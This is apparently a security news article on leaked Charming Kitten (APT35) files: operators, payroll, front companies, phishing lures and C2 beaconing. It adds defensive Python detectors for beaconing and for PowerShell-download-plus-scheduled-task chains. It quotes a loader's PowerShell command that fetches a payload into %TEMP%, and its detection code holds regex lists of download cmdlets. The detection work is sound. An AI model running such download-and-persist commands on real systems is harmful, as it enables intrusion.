Fresh leaks from the Iranian state‑backed group Charming Kitten, also tracked as APT35, have exposed key personnel, front companies, and thousands of compromised systems spread across five continents.
The internal files show that Iran’s Department 40, within the IRGC Intelligence Organization, runs long‑term intrusion campaigns that combine cyber‑espionage with surveillance and targeting operations.
Stolen dashboards and payroll records now link named operators to specific hacking activity rather than anonymous threat labels.
The leak further reveals the financial structure backing these operations, including salary slips for the Sisters Team and Brothers Team, and payment flows routed through front companies that appear to be normal IT or cloud service providers.
Compromised systems include VPN gateways, email servers, and command‑and‑control nodes used to steer malware already deployed inside government offices, universities, and telecom providers.
The result is a clear picture of how money, management, and malware converge in a single system.
Nariman Gharib, a security researcher, noted that the same material also exposes tasking sheets and target lists that tie Charming Kitten malware to specific diplomatic, energy, and civil society networks.
The malware usually arrives via spear‑phishing emails, fake login pages, or malicious document attachments that impersonate meeting invitations, pay slips, or policy documents.
Once a user opens the lure and enables scripts or enters credentials, the operators gain an initial foothold that leads to complete device control and data exfiltration.
Log data from the leaked dashboards shows beacons from victim hosts returning to Iranian‑controlled servers over HTTPS at regular intervals, often hidden within what appears to be normal web traffic.
Figure: Confidential IAEA inspection documents (Source – Nariman Gharib)
These hosts sit inside email gateways, domain controllers, and user laptops, giving operators access to email, file shares, and identity systems. The leaked report highlights clusters of infected machines grouped by region and sector, underscoring the campaign’s reach.
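The periodic HTTPS beaconing described above is something a defender can look for in proxy or firewall logs without any implant-specific indicator. The following is an added example, not code from the article or from the leaked material: it groups outbound connections by source and destination and flags series whose inter-connection gaps are nearly constant. The log lines, host names and destinations are constructed for the example.

```python
"""Beacon-interval heuristic over constructed proxy log lines.

Added example (not from the article or the leak): flags hosts whose
outbound connections to one destination recur at a near-constant
interval, the pattern the leaked dashboards show for victim hosts.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample lines: "<timestamp> <src_host> <dst_host> <bytes>".
# The first destination is polled every ~300 s; the second is ordinary mail use.
SAMPLE_LOG = """\
2024-01-01T10:00:00 laptop-17 cdn.example-updates.test 412
2024-01-01T10:05:01 laptop-17 cdn.example-updates.test 418
2024-01-01T10:10:00 laptop-17 cdn.example-updates.test 410
2024-01-01T10:14:59 laptop-17 cdn.example-updates.test 415
2024-01-01T10:20:01 laptop-17 cdn.example-updates.test 411
2024-01-01T10:00:12 laptop-17 mail.example.test 9810
2024-01-01T10:01:40 laptop-17 mail.example.test 120333
2024-01-01T10:17:05 laptop-17 mail.example.test 4402
2024-01-01T10:33:50 laptop-17 mail.example.test 77120
"""


def parse_log(text):
    """Group connection timestamps by (source, destination)."""
    series = defaultdict(list)
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, _size = line.split()
        series[(src, dst)].append(datetime.fromisoformat(ts))
    return series


def gaps_seconds(timestamps):
    """Seconds between consecutive connections, in time order."""
    t = sorted(timestamps)
    return [(b - a).total_seconds() for a, b in zip(t, t[1:])]


def jitter_ratio(timestamps):
    """Std-dev of the gaps divided by their mean; near 0 means a fixed interval.

    Returns None when there are too few gaps to judge.
    """
    gaps = gaps_seconds(timestamps)
    if len(gaps) < 3 or mean(gaps) == 0:
        return None
    return pstdev(gaps) / mean(gaps)


def find_beacons(text, max_jitter=0.1, min_hits=4):
    """Return [(src, dst, mean_gap_seconds)] for periodic connection series."""
    hits = []
    for (src, dst), stamps in parse_log(text).items():
        if len(stamps) < min_hits:
            continue
        ratio = jitter_ratio(stamps)
        if ratio is not None and ratio <= max_jitter:
            hits.append((src, dst, round(mean(gaps_seconds(stamps)))))
    return hits


if __name__ == "__main__":
    for src, dst, gap in find_beacons(SAMPLE_LOG):
        print(f"possible beacon: {src} -> {dst} every ~{gap}s")
```

The thresholds are deliberately tunable: implants that randomise their sleep time produce a higher jitter ratio, so in practice `max_jitter` is raised and the result is combined with destination reputation and request-size uniformity rather than used on its own.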
Infection mechanism and command and control
Infection often starts with a small loader that runs in memory after a user opens a macro or HTML lure.
Short PowerShell commands fetch the primary payload from a fixed but hidden URL, which is now documented in a complete technical breakdown of the Charming Kitten tools.
# $u holds the payload URL that the loader supplies
Invoke-WebRequest $u -OutFile "$env:TEMP\svc.exe"
Logs from the leak show this binary running as a scheduled task, giving stable access while blending with regular Windows activity.
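The two-step chain just described (a PowerShell download written into the user's temp directory, then a scheduled task that runs the dropped binary) is visible in Windows security auditing. The following is an added example, not code from the article or the leak: it applies two rules to constructed process-creation (4688) and scheduled-task-creation (4698) events and correlates hosts that trigger both. The event contents, host names and task names are made up for the example.

```python
"""Detection rules over constructed Windows security events.

Added example (not the article's code): flags (1) PowerShell downloads
that write a file into the user's temp directory and (2) scheduled tasks
whose action runs from that directory, then correlates hosts showing both.
"""
import re

# Constructed events in the shape a SIEM would hand over (not real logs).
EVENTS = [
    {"EventID": 4688, "Host": "ws-041", "User": "jdoe",
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -w hidden -c Invoke-WebRequest $u -OutFile $env:TEMP\svc.exe"},
    {"EventID": 4698, "Host": "ws-041", "User": "jdoe",
     "TaskName": r"\Microsoft\Windows\UpdateSvc",
     "TaskContent": r"<Exec><Command>C:\Users\jdoe\AppData\Local\Temp\svc.exe</Command></Exec>"},
    {"EventID": 4688, "Host": "ws-042", "User": "admin",
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -c Get-Service -Name Spooler"},
    {"EventID": 4698, "Host": "ws-042", "User": "SYSTEM",
     "TaskName": r"\Microsoft\Windows\Defrag\ScheduledDefrag",
     "TaskContent": r"<Exec><Command>%windir%\system32\defrag.exe</Command></Exec>"},
]

# Common download primitives seen in PowerShell one-liners.
DOWNLOAD_CMDLET = re.compile(r"(invoke-webrequest|\biwr\b|start-bitstransfer|downloadfile)", re.I)
# Paths that resolve to a user's temp directory.
TEMP_PATH = re.compile(r"(\$env:temp\\|%temp%\\|\\appdata\\local\\temp\\)", re.I)


def check_process_event(ev):
    """Rule 1: PowerShell fetching something and writing it under TEMP."""
    if ev.get("EventID") != 4688:
        return None
    if "powershell" not in ev["NewProcessName"].lower():
        return None
    cmd = ev["CommandLine"]
    if DOWNLOAD_CMDLET.search(cmd) and TEMP_PATH.search(cmd):
        return {"rule": "ps_download_to_temp", "host": ev["Host"],
                "user": ev["User"], "detail": cmd}
    return None


def check_task_event(ev):
    """Rule 2: scheduled task whose action executes a file from TEMP."""
    if ev.get("EventID") != 4698:
        return None
    m = re.search(r"<Command>(.*?)</Command>", ev["TaskContent"], re.I | re.S)
    if m and TEMP_PATH.search(m.group(1)):
        return {"rule": "task_runs_from_temp", "host": ev["Host"],
                "user": ev["User"], "detail": ev["TaskName"]}
    return None


def run_rules(events):
    """Apply both rules and return the list of findings."""
    findings = []
    for ev in events:
        for rule in (check_process_event, check_task_event):
            hit = rule(ev)
            if hit:
                findings.append(hit)
    return findings


def correlate(findings):
    """Hosts that show both the download and the persistence step."""
    by_host = {}
    for f in findings:
        by_host.setdefault(f["host"], set()).add(f["rule"])
    return {h for h, rules in by_host.items()
            if {"ps_download_to_temp", "task_runs_from_temp"} <= rules}


if __name__ == "__main__":
    hits = run_rules(EVENTS)
    for h in hits:
        print(f"{h['rule']}: {h['host']} ({h['user']}) {h['detail']}")
    print("download+persistence chain on:", sorted(correlate(hits)))
```

Event 4688 only carries the `CommandLine` field when the "Include command line in process creation events" audit policy is enabled; environments without it get the same signal from Sysmon Event ID 1. The task rule reads the XML in 4698 rather than the task name, since the name is chosen by the operator to look like a built-in Windows task.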